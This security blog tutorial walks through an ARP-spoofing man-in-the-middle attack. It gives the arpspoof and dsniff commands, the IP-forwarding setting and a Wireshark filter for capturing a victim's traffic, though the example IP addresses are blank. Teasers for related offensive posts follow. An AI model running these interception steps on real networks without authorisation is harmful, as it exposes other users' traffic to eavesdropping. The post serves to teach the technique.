Man-In-The-Middle (MITM) with arpspoof

Apr 8, 2020 by Thibault Debatty | 771 views

Offensive Security

In this post we show how to easily perform a L2 man-in-the-middle attack using arpspoof on a standard Ubuntu computer...


To install arpspoof you actually have to install the dsniff package:

sudo apt install dsniff

And you are done...


Before using arpspoof, you need to activate packet forwarding in your kernel:

sudo sysctl net.ipv4.ip_forward=1

The classical way to use arpspoof is the following:

sudo arpspoof -i <interface> -t <target> -r <gateway>


  • interface is your network interface that arpspoof has to use
  • target is the IP address of the victim
  • gateway is the IP address of the default gateway on the network
  • -r indicates that arpspoof should poison both the target and the default gateway, to capture traffic in both directions

For this example, we want to capture the traffic between a victim on our network (IP and the default gateway (IP Hence we will collect all traffic between the victim and the internet...

So now is the good moment to start wireshark and start collecting traffic. To see only traffic related to victim (and not our own traffic), we can use the following filter in wireshark:

ip.addr ==

At first very few or no packets are captured (only broadcast packets).

Now, in a terminal, let's start arpspoof:

sudo arpspoof -i enp0s3 -t -r

After a few seconds, packets start to appear in wireshark... We can now start analyzing the traffic between the victim and the internet!

Change the MAC address of your Linux system
Still today, some network monitoring tools and security systems rely on the MAC address of the host. However, a MAC address is not an authentication mechanism! It can be easily changed. More precisely, by default most operating systems will use the MAC address burnt into the network interface as the source MAC address for all emitted Ethernet frames. But you can easily reconfigure your system to change this behavior. Here is how to do that on a Linux computer.
Email (in)security
Sending emails relies mainly on SMTP, the Simple Mail Transfert Protocol. This protocol is actually quite old: the first traces date back from the 70's, and the first standardisation took place in 1982 (RFC 821). It is primarily a very simple and insecure protocol, although multiple additional protocols have developed to protect emails and avoid SPAM. In this blog post we review these different protection mechanisms.
Setting up a watering hole attack with metasploit
In recent years we have witnessed multiple organised attacks against countries and companies using malicious code that was distributed via a legitimate website. These types of attacks are called "watering hole attacks" as they target well known and used websites and compromising them. You could compare this to dumping poison or other dangerous chemicals in a pond or well, where your intentions are to target any and all that use that source. One of the more famous such attacks was the CCleaner Watering Hole attack, which used the well-known tool CCleaner to distribute its malicious code.